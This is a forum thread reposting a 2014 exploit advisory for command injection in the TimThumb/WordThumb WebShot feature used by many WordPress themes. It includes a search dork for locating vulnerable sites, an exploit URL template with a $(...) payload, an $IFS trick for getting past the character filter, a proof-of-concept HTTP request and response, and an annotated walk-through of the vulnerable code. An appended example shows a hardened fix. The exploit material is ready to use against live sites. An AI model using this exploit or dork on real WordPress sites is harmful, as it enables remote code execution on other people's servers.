sniffer Posted June 27, 2014

exploit: http://www.exploit-db.com/exploits/33851/
news: Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk - The Hacker News
Dork: inurl:"/themify/" intitle:"index of /"

#######################################################################
# [LONGCAT ASCII-art banner]
#
# Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
# Affected website : a lot of Wordpress themes, plugins, 3rd party components
# Exploit Author : @u0x (Pichaya Morimoto)
# Release date : June 24, 2014
#
# Special Thanks to 2600 Thailand group
# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#######################################################################

[+] Description
============================================================
TimThumb is a small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications. Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes.
http://www.binarymoon.co.uk/projects/timthumb/
https://code.google.com/p/timthumb/

The original project WordThumb 1.07 is also vulnerable (https://code.google.com/p/wordthumb/). They both share exactly the same WebShot code!

And there are several projects that shipped with "timthumb.php", such as:

Wordpress Gallery Plugin
https://wordpress.org/plugins/wordpress-gallery-plugin/

IGIT Posts Slider Widget
http://wordpress.org/plugins/igit-posts-slider-widget/

All themes from http://themify.me/ contain the vulnerable "wordthumb" in "<theme-name>/themify/img.php".

[+] Exploit
============================================================
http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>)

** Note that the OS command payload MUST be within the following character set:
[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]
** Spaces, Pipe, GT sign are not allowed.
** This WebShot feature is DISABLED by default.
** CutyCapt and XVFB must be installed in constants.

[+] Proof-of-Concept
============================================================
There are a couple of techniques that can be used to bypass the limited charset, but I will use the shell variable $IFS instead of a space in this scenario.

PoC Environment:
Ubuntu 14.04 LTS
PHP 5.5.9
Wordpress 3.9.1
Themify Parallax Theme 1.5.2
WordThumb 1.07

Crafted Exploit:
http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)

    GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
    Host: longcatlab.local
    Proxy-Connection: keep-alive
    Cache-Control: max-age=0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685

    HTTP/1.1 400 Bad Request
    Date: Tue, 24 Jun 2014 07:20:48 GMT
    Server: Apache
    X-Powered-By: PHP/5.5.9-1ubuntu4
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Length: 3059
    Connection: close
    Content-Type: text/html

    …
    <a href='http://www.php.net/function.getimagesize' target='_new'>getimagesize</a>( )</td><td title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr></table></font>
    <h1>A WordThumb error has occured</h1>
    The following error(s) occured:<br/><ul><li>The image being resized is not a valid gif, jpg or png.</li></ul><br /><br />
    Query String : webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />
    WordThumb version :1.07</pre>

Even though it responds with error messages, the injected OS command has already been executed.

    $ ls /tmp/longcat -lha
    -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat

[+] Vulnerability Analysis
============================================================
https://timthumb.googlecode.com/svn/trunk/timthumb.php
Filename: timthumb.php

    if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
    if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt');
    if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
    ...
    timthumb::start();                     // <-- start script
    ...
    public static function start(){
        $tim = new timthumb();             // <-- create timthumb object, call __construct()
        ...
        $tim->run();
        ...
    public function __construct(){
        ...
        $this->src = $this->param('src');  // <-- set "src" variable to HTTP GET "src" parameter
        ...
        if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
            ...
            $this->isURL = true;           // <-- http/s prefix results in isURL = true
        }
        ...
    protected function param($property, $default = ''){
        if (isset ($_GET[$property])) {
            return $_GET[$property];
        ...
    public function run(){
        if($this->isURL){
            ...
            if($this->param('webshot')){   // <-- HTTP GET "webshot" must be submitted
                if(WEBSHOT_ENABLED){       // <-- this pre-defined constant must be true
                    ...
                    $this->serveWebshot(); // <-- call webshot feature
                } else {
        ...
    protected function serveWebshot(){
        ...
        if(! is_file(WEBSHOT_CUTYCAPT)){   // <-- check existence of cutycapt
            return $this->error("CutyCapt is not installed. $instr");
        }
        if(! is_file(WEBSHOT_XVFB)){       // <-- check existence of xvfb
            return $this->Error("Xvfb is not installed. $instr");
        }
        ...
        $url = $this->src;
        if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){   // <-- check valid URL #LoL
            return $this->error("Invalid URL supplied.");
        }
        $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url);
        // <-- check valid URL as specified in RFC 3986, http://www.ietf.org/rfc/rfc3986.txt
        ...
        if(WEBSHOT_XVFB_RUNNING){
            putenv('DISPLAY=:100.0');
            $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile";   // <-- OS shell command injection
        } else {
            $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile";   // <-- OS shell command injection
        }
        ...
        $out = `$command`;   // <-- execute $command as shell command

"PHP supports one execution operator: backticks (``). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - http://www.php.net//manual/en/language.operators.execution.php

"$url" is not escaped, so "$()" inside "$command" results in arbitrary code execution.

Jabber : Sniffer@jabber.ru
Skype : Ali_Sniffer
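To show why the double-quoted interpolation above is the defect, here is an added example (not TimThumb's or WordThumb's own code; the function names and the sample URL are assumptions): the advisory's filter-then-interpolate pattern beside a hardened builder that validates the URL with parse_url() and wraps every argument in escapeshellarg(), so the shell never sees an unquoted $(...). No command is executed; only the two command strings are built.

```php
<?php
// Added example, not TimThumb's code. Mirrors the advisory's pattern: the RFC 3986
// character filter keeps "$", "(" and ")", and the URL is then interpolated inside
// double quotes, which the shell still expands "$(...)" within.
function buildWebshotCommandVulnerable(string $cuty, string $url, string $out): string
{
    $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url);
    return "$cuty --url=\"$url\" --out-format=png --out=$out";
}

// Hardened version: accept only an http(s) URL with a plain hostname, then quote
// every interpolated value with escapeshellarg(), which single-quotes it so the
// shell performs no substitution inside. Returns null when the URL is rejected.
function buildWebshotCommandHardened(string $cuty, string $url, string $out): ?string
{
    $parts = parse_url($url);
    if ($parts === false
        || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        || !preg_match('/^[A-Za-z0-9.-]+$/', $parts['host'])) {
        return null; // caller should emit an error, as timthumb's error() does
    }
    return escapeshellarg($cuty)
         . ' --url=' . escapeshellarg($url)
         . ' --out-format=png'
         . ' --out=' . escapeshellarg($out);
}

// Constructed sample input modelled on the advisory's PoC (hostname is assumed).
$src = 'http://example.invalid/$(touch$IFS/tmp/longcat)';

// The "$(...)" survives the filter and lands between double quotes: shell-expandable.
echo buildWebshotCommandVulnerable('/usr/local/bin/CutyCapt', $src, '/tmp/shot.png'), "\n";

// Same input, but escapeshellarg() makes the whole URL one literal argument.
echo buildWebshotCommandHardened('/usr/local/bin/CutyCapt', $src, '/tmp/shot.png'), "\n";
```

On PHP 7.4 and later, passing proc_open() an array of arguments bypasses the shell entirely, which removes the need to escape at all.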
r_m_a Posted June 27, 2014

    A WordThumb error has occured
    The following error(s) occured: You added the webshot parameter but webshots are disabled on this server. You need to set WEBSHOT_ENABLED == true to enable webshots.